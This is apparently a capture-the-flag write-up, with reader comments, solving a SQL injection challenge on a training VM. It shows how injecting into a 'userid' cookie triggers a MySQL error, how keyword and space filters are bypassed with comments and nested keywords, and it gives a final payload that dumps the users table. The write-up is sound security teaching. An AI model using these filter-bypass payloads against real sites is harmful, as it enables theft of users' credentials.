You can download the complete challenge VM from here. They have provided the online version of first two levels. I was interested in having a look at it. http://cloaknet.csc.kth.se:8080/proxy.jsp
There is a login page and our goal is to extract all the usernames and passwords from the database.
If you try injecting the login form, none of the injections would work. But there was this text called “No account?” when you click it you get this message.
After logging with demo:demo we are taken to “proxypanel.jsp” which displays source, target and date.
Let’s analyze this using Burp. At first when we login this is POST request. Notice that this request is being made to “proxy.jsp” page.
[code language=”sql”]
user=demo&pass=demo&login=1
&token=17312256995467290477108424856116888064446348101932685808552243140
&asd=Login
[/code]
Too bad the web app is using tokens, this means we cannot repeat the request to experiment.
After forwarding the request another GET request is being made to “proxypanel.jsp” the actual page where we land. In here the cookie values are being passed.
Let’s have a look at the cookies.
There are two session cookies, JESSIONID and userid. Let’s mutate the userid parameter and check the output. userid=71934”\\;
Aha!
[code language=”sql”]
com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ””” at line 1
[/code]
After counting the columns I got 3 columns. You cannot just inject in here, because there is a filter. From what I noticed keywords such as union, select and spaces are being filtered. For bypassing spaces I just used comments /**/ and for bypassing keywords such as union and select I used UNunionION and SELselectECT. However when I tried giving 1,2,3 I get the error “The used SELECT statements have a different number of columns”
Our target is to dump the usernames and passwords, but the userid should be column name from a different table. I just guessed there should be table as “users” and tried this query.
[code language=”sql”]
-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users
[/code]
w00t! Here we go 🙂
Thanks for reading.
cool challenge,thanks for clean solution 🙂
😀 Ya, This is a very nice challenge. Thanks for your solution bro 😀
Good write-up of the first part, but that’s not the end of the challenge.. there is much more to this one…